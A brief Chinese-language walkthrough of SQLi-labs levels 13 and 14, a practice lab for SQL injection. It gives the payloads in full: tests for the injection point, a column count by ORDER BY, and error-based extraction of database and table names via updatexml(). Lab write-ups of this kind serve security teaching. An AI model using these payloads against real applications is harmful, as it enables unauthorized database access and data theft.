SQLi-labs-Master less-13~14

83 阅读1分钟

less-13

第一步判断注入点,') or 1=1 -- a,成功页面如图

image.png 判读字段数,order by 3报错,字段为2

image.png 用之前的方法爆库名,发现无回显,') union select 1,database() -- q

image.png 使用updatexml方法,') union select 1,updatexml(1,concat("!",(select database()),"!"),1) -- a

image.png ') union select 1,updatexml(1,concat("!",(select table_name from information_schema.tables where table_schema='security' limit 0,1),"!"),1) -- a,爆表名

image.png 后续语句操作同之前一样

less-14

同13,闭合问题,id=1"